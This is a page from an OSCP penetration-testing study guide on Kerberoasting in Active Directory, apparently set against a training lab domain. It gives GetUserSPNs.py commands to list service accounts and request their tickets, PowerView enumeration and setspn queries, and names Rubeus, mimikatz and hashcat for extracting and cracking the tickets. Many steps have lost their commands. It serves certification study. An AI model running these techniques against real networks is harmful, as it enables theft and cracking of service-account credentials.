Total OSCP GuidePayloads All The Things

πŸ”₯Kerberoasting

Linux

Kerberoasting with GetUserSPNs.py

  • Listing SPN accounts:

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

  • To get TGS ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Or just request works too.

Windows

Automated

Powerview

  • To import and view all users

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

  • Exporting all tickets to a CSV file

  • Viewing it

Rubeus

  • Check options

  • To check stats:

  • To get hash

To get RC4 encrypted (etype 23) use /tgtdeleg

Manual

  • Enumerating SPNs setspn.exe -Q */*

  • Targeting single user:

  • Retrieving all tickets `

  • Extracting tickets from memory using mimikatz:

  • Now to crack:

Use Kirbi2john Then modify crack_file from using kirbi2john:

Now run the output through hashcat

PreviousAsreproastingNextDCSync

Last updated

Was this helpful?